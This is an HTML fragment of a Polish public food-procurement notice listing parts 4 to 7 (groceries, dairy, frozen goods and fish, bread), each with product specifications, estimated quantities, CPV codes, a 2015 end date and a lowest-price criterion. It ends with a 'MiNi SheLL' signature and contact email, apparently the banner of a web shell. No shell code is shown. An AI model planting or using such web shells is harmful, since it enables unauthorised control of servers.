<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	BAZYLIA suszona, aromatyczna, w paczkach 10g	szt	56
2	CYNAMON mielony, w opakowaniach 20g	szt	112
3	CUKIER biały, kryształ, opakowania 1 kg	szt	1120
4	CUKIER PUDER w paczkach 400g	szt	56
5	CUKIER WANILIOWY, aromatyczny, w paczkach ok 20g	szt	140
6	CRIPSY, opakowanie 12g, smak: jabłko z bananem, jabłko z truskawką, jabłko z toffi	szt	2300
7	PRZYPRAWA Z PŁYNIE do zup i sosów, opakowanie 960g	szt	60
8	PRZYPRAWA WARZYWNA W PROSZKU suszona warzywa min 15,5%, opakowanie 1 kg	szt	35
9	KWASEK CYTRYNOWY, opakowanie 20g	szt	64
10	LIŚĆ LAUROWY, aromatyczny, cały, opakowanie 6g,	szt	56
11	MAJERANEK, aromatyczny, opakowanie 8g,	szt	280
12	OREGANO , aromatyczne, opakowanie 10g	szt	112
13	PROSZEK DO PIECZENIA, opakowanie 30g,	szt	98
14	PAPRYKA SŁODKA aromatyczna, opakowanie ok 20g	szt	100
15	PIEPRZ ZIOŁOWY, mielony, opakowanie  20g,	szt	600
16	SÓL WARZONA JODOWANA, 1kg	szt	90
17	TYMIANEK, aromatyczny, opakowanie 10g,	szt	60
18	ZIELE ANGIELSKIE, opakowanie 15g,	szt	60
19	ZIOŁA PROWANSALSKIE, opakowanie 10g,	szt	60
20	ANANAS, plastry, puszka, duża, w syropie	szt	280
21	BRZOSKWINIA, polówki, w syropie, puszka, duża	szt	85
22	BUDYŃ z cukrem, opakowanie 40g, waniliowy lub śmietankowy,	szt	360
23	CUKIERKI OWOCOWE, o konsystencji toffi	kg	12
24	DROŻDŻE kostka, 100g	szt	224
25	DŻEM, smak: truskawka, wiśnia, brzoskwinia, opakowanie ok 270g, 100% owoców	szt	280
26	CHRUPKI KUKURYDZIANE dla dzieci, naturalne	szt	420
27	GALARETKA, z cukrem, bez konserwantów, truskawka, wiśnia, cytryna	szt	840
28	HERBATA MIĘTOWA, ekspresowa 40 g	szt	56
29	HERBATA ekspresowa czarna 108g	szt	28
30	HERBATA zielona z maliną, ekspresowa 45g	szt	28
31	HERBATA dzika róża/żurawina, ekspresowa 45g	szt	9
32	HERBATA dzika róża/malina, ekspresowa 45g	szt	9
33	HERBATA dzika róża/pigwa truskawka, ekspresowa 45g	szt	9
34	KECZUP łagodny, 500g, bez konserwantów i sztucznych barwników	szt	224
35	KAKAO, extra ciemne, o obniżonej zawartości tłuszczu , 300g	szt	14
36	KAKAO GRANULOWANE, słodzone, zawartość 10 witamin, z duża zawartością wapnia, (rozpuszczalny napój kakaowy), duże opakowanie ok 300g	szt	140
37	KAWA ZBOŻOWA, bez kofeiny, 150g	szt	168
38	KONCENTRAT POMIDOROWY, opakowanie ok 200g, min 30% pomidorów	szt	532
39	KISIEL, z cukrem, malina, truskawka, wiśnia, cytryna	szt	280
40	KREM CZEKOLADOWO-ORZECHOWY, orzechy laskowe min 13%, kakao w proszku o obniżonej zawartości tłuszczu min 7,4%, mleko odtłuszczone w proszku min 6,6% 350g	szt	168
41	KASZA JAGLANA, 350g	szt	28
42	KASZA JĘCZMIENNA, 400g	szt	336
43	KASZA KUSKUS, 300g	szt	336
44	KASZA KUKURYDZIANA, 350g	szt	56
45	KASZA MANNA, opakowanie 1 kg	szt	28
46	MUSZTARDA SAREPSKA/MIODOWA, 200g	szt	140
47	MAJONEZ, napoleoński, 900g	szt	140
48	MĄKA WROCŁAWSKA, opakowanie 1kg, pszenna, typ 500	szt	420
49	MAKARON, świderki, muszelki, 500g	szt	84
50	MAKARON, spaghetti, 500g	szt	420
51	MIÓD WIELOKWIATOWY opakowanie ok 400g	szt	84
52	MĄKA TORTOWA, opakowanie 1kg, pszenna, typ 500	szt	196
53	MĄKA ZIEMNIACZANA opakowanie 1kg,	szt	28
54	OLEJ ROŚLINNY opakowanie 5l	szt	168
55	OCET JABŁKOWY, 270 ml	szt	56
56	PŁATKI KUKURYDZIANE, opakowanie ok 250 g	szt	420
57	PŁATKI OWSIANE GÓRSKIE, opakowanie ok 500g	szt	84
58	RYŻ, biały, paraboliczny, basmanti, opakowanie 1kg	szt	112
59	ŚNIEŻKA w proszku, z cukrem, 60g	szt	280
60	SYROP, opakowanie ok 310 ml, smak: truskawka, malina, wiśnia, 	szt	140
61	SOS DESEROWY, opakowanie ok 200g , truskawka, toffi,	szt	504
62	NAPÓJ WIELOOWOCOWY , opakowanie 1 l szklana butelka, z zagęszczonych soków 20%, 12 witamin	szt	420
63	NAPÓJ, opakowanie 2l, smak jabłkowy, zagęszczony sok jabłkowy min 21%, 11 witamin, bez dodatku cukru	szt	80
64	NAPÓJ multiwitamina, opakowanie 2l, z zagęszczonych soków i przecierów min 20%, 11 witamin, bez dodatku cukru	szt	80
65	SOK 100%, przecierowy, bez cukru, bez konserwantów, bez sztucznych barwników, 0.9l, smak dowolny	szt	98
66	GROSZEK KONSEROWOWY, 400g	szt	170
67	KUKURYDZA KONSERWOWA, 400g	szt	90
68	OGÓRKI KONSERWOWE, 900g, słoik szklany	szt	112
69	PRZECIER OGÓRKOWY, z ogórków kwaszonych, słoik szklany ok 290 g	szt	224
70	SZCZAW KONSERWOWY, przecierany, bez łodyg, słoik szklany ok 290 g	szt	224
71	ZAKWAS DO ŻURKU, butelka, 0,5l, naturalny koncentrat żurku	szt	280
72	BUŁKA TARTA, zmielona z pieczywa pszennego, opakowanie 500g	szt	504
73	CZOSNEK GRANULOWANY, opakowanie 20g,	szt	420
74	PASZTET DROBIOWY, w puszce 280g, mięso i składniki drobiowe min 60 %	szt	224
75	CIASTKA KRUCHE, bez zawartości mleka,	kg	28
76	HERBATNIKI o smaku maślanym posypane cukrem 2kg	szt	14
77	CIASTKA kruche z kremowym nadzieniem 3 kg	szt	14
78	WAFLE, 2,5kg, waniliowe	szt	14
79	RURKI WANILIOWE, 3 kg	kg	84
80	WAFLE RYŻOWE, naturalne, 120g	szt	420.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6, 15.85.10.00-8, 15.41.11.00-3, 15.83.00.00-5, 15.86.00.00-4, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	JOGURT OWOCOWY do picia w butelce ok 250g, smak owoce leśne lub truskawka, zawartość owoców min 3,3%, z zawartością żywych kultur bakterii jogurtowych oraz Lactobacillus acidophilus i Bifidobacterium	szt	1800
2	JOGURT OWOCOWY w kubeczku ok 120g, smak truskawkowy, zawartość tłuszczu nie więcej niż 1%, mleko odtłuszczone min 35,4%, żywe kultury bakterii jogurtowych	szt	1800
3	JOGURT NATURALNY opakowanie ok 350g, zawartość tłuszczu 2,5%	szt	120
4	MLEKO 3,2%, w kartonie 1l, UHT	l	560
5	MLEKO SPOŻYWCZE 2%, opakowanie foliowe o pojemności 5l	l	3950
6	MASŁO ROŚLINNE,margaryna o zawartości 80% tłuszczu, zawiera olej słonecznikowy witaminę A, D3, E i lecytynę, nie zawiera konserwantów i cholesterolu, opakowanie ok 250g	szt	350
7	MASŁO KOSTKA, opakowanie 200g, składniki: śmietanka pasteryzowana, zawartość tłuszczu mlecznego 82%, nie zawiera tłuszczów roślinnych	szt	200
8	ŚMIETANA 18% tłuszczu, opakowanie ok 400g,	szt	1600
9	TWARÓG TŁUSTY, smak:czysty, łagodny, lekko kwaśny, jednolita konsystencja, zwarta bez grudek, lekko luźna	kg	70
10	SER ŻÓŁTY typu gouda, zawartość tłuszczu ok 28%, białko ok 25%	kg	170
11	SER TOPIONY kremowy, smak śmietankowy, opakowanie kostka o masie 100g, bez konserwantów, zawartość tłuszczu ok 25%	szt	200
12	SEREK HOMOGENIZOWANY, opakowanie ok 150g, smak waniliowy, zawartość tłuszczu ok 3%	szt	75
13	SEREK TWAROGOWY do smarowania, opakowanie ok 150g, smak śmietankowy nie zawiera barwników, konserwantów, zagęstników, zawartość tłuszczu ok 20%	szt	252.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.51.00.00-6, 15.53.00.00-3, 15.54.00.00-5, 15.55.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki i ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	MIESZANKA KOMPOTOWA mrożona, skład: śliwki, wiśnie, porzeczka czarna, truskawki	kg	336
2	PORZECZKA CZARNA mrożona,	kg	224
3	TRUSKAWKI mrożone, opakowanie ok 450g	szt	140
4	WIŚNIE bez pestek, mrożone,	kg	224
5	MARCHEW, kostka, mrożona	kg	224
6	BROKUŁ, różyczki, mrożony, opakowanie ok 450g	szt	224
7	BROKUŁ, różyczki, mrożony	kg	448
8	FASOLKA SZPARAGOWA mrożona, opakowanie ok 450g	szt	84
9	FASOLKA SZPARAGOWA, mrożona	kg	224
10	KALAFIOR różyczki, mrożony, opakowanie ok 450g	szt	112
11	KALAFIOR różyczki, mrożony	kg	168
12	MIESZANKA WARZYWNA, 7 składnikowa, opakowanie ok 450g	szt	196
13	MIESZANKA WARZYWNA, 3 składnikowa, opakowanie ok 450g	szt	280
14	SZPINAK rozdrobniony, mrożony, opakowanie 450g	szt	112
15	FILET DORSZ, MINTAJ, MIRUNA w postaci SHP, z zawartością glazury do 3%,	kg	196.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	BATON WROCŁAWSKI, masa netto 200g, pszenny	szt	1800
2	PALUSZEK Z CYNAMONEM LUB BUŁECZKA Z MARMOLADĄ, masa netto 80g, pieczywo pszenne pół cukiernicze	szt	3920
3	CHAŁKA ZDOBNA, masa netto 400g, pieczywo pół cukiernicze	szt	280
4	CHLEB BALTONOWSKI, masa netto 600g, mieszany pytlowy	szt	1600
5	CHLEB ŻYTNI, 400g, mąka żytnia i pszenna	szt	340.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.81.10.00-6, 15.81.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com